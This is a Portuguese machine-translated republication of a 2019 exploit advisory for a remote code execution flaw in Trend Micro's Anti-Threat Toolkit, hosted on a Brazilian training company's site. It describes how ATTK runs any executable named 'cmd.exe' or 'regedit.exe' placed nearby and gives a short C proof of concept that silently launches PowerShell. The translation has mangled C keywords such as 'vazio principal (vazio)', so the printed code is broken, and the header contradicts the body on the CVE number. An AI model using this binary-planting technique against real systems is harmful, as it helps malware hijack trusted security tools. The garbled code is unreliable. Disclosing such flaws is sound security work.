fbpx

Trend Micro Anti-Threat Toolkit 1.62.0.1218 – Remote Code Execution

Trend Micro Anti-Threat Toolkit 1.62.0.1218 – Remote Code Execution

# Exploit Title: Kit de ferramentas anti-ameaças da Trend Micro 1.62.0.1218 – Execução remota de código
# Data: 2019-10-19
# Exploit Autor: hyp3rlinx
# Página inicial do fornecedor: www.trendmicro.com
# Versão: 1.62.0.1218 e abaixo
# Testado em: Microsoft Windows
# CVE: N / D

[+] Créditos: John Page (aka hyp3rlinx)
[+] Site: hyp3rlinx.altervista.org
[+] Fonte: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
[+] ISR: Segurança de Aparições
[Fornecedor]
www.trendmicro.com

[Produtos]
Kit de Ferramentas Anti-Ameaças da Trend Micro (ATTK)
1.62.0.1218 e abaixo

O ATTK (Trend Micro Anti-Threat Toolkit) pode analisar problemas de malware e limpar infecções.
Ele pode ser usado para executar análises forenses do sistema e limpar os seguintes tipos de infecção:

Infecção geral por malware
Registro mestre de inicialização Infecção
Infecção por CIDOX / RODNIX
Infecção por Rootkit
Infecção por Zbot
Infecção por Cryptolocker
etc ..

[Tipo de vulnerabilidade]
Execução remota de código

[Referência CVE]
CVE-2019-9491

[Problema de segurança]
O ATTK (Trend Micro Anti-Threat Toolkit) carregará e executará arquivos .EXE arbitrários se um autor de malware
passa a usar a convenção de nomenclatura vulnerável de “cmd.exe” ou “regedit.exe” e o malware pode ser
colocado na proximidade do ATTK quando uma varredura é iniciada pelo usuário final.

Como o ATTK é assinado por um editor verificado e, portanto, assumiu a confiança de quaisquer avisos de segurança do MOTW
são ignorados se o malware foi baixado da Internet, também pode se tornar um mecanismo de persistência,
toda vez que o Anti-Threat Toolkit é executado, o malware pode atacar.

Componentes afetados independentes do ATTK e outras integrações (por exemplo, WCRY Patch Tool, OfficeScan Toolbox, etc.)

attk_collector_cli_x64.exe
Hash: e8503e9897fd56eac0ce3c3f6db24fb1

TrendMicroRansomwareCollector64.r09.exe
Hash: 798039027bb4363dcfd264c14267375f

attk_ScanCleanOnline_gui_x64.exe
Hash: f1d2ca4b14368911c767873cdbc194ed

[Referências]
https://success.trendmicro.com/solution/000149878
* Todas as versões do ATTK foram atualizadas com a versão mais recente. Kit de Ferramentas Anti-Ameaças (ATTK) 1.62.0.1223

[Exploração / POC]
Compile um .EXE usando o código “C” abaixo e use a convenção de nomenclatura “cmd.exe” ou “regedit.exe”.
Execute o Anti-Threat Toolkit e assista ao console ATTK para ver o arquivo de Trojan ser carregado e executado.

#include <windows.h>

vazio principal (vazio) {
puts (“Trend Micro Anti-Threat Toolkit PWNED!”);
puts (“Descoberta: hyp3rlinx”);
puts (“CVE-2019-9491 \ n”);
WinExec (“PowerShell”, 0);
}

[URL do vídeo POC]

[Acesso à rede]
Controlo remoto

[Gravidade]
Alto

[Cronograma da divulgação]
Notificação do fornecedor: 9 de setembro de 2019
Fornecedor confirma vulnerabilidade: 25 de setembro de 2019
Solicitações do fornecedor para coordenar o comunicado: 25 de setembro de 2019
19 de outubro de 2019: Divulgação pública

[+] Isenção de responsabilidade
As informações contidas neste comunicado são fornecidas “no estado em que se encontram”, sem garantias ou garantias de adequação ao uso ou não.
É concedida permissão para a redistribuição deste comunicado, desde que ele não seja alterado, exceto pela reformatação, e
esse crédito é dado. É dada permissão explícita para inserção em bancos de dados de vulnerabilidades e similares, desde que os devidos créditos
é dado ao autor. O autor não é responsável por qualquer uso indevido das informações aqui contidas e não aceita nenhuma responsabilidade
por qualquer dano causado pelo uso ou uso indevido dessas informações. O autor proíbe qualquer uso malicioso de informações relacionadas à segurança
ou explorações pelo autor ou em outro lugar. Todo o conteúdo (c).

hyp3rlinx

11 de novembro de 2019

Sobre nós

A Linux Force Brasil é uma empresa que ama a arte de ensinar. Nossa missão é criar talentos para a área de tecnologia e atender com excelência nossos clientes.

CNPJ: 13.299.207/0001-50
SAC:         0800 721 7901

[email protected]

Comercial  Comercial: (11) 3796-5900

Suporte:    (11) 3796-5900
[email protected]

Copyright © Linux Force Security  - Desde 2011.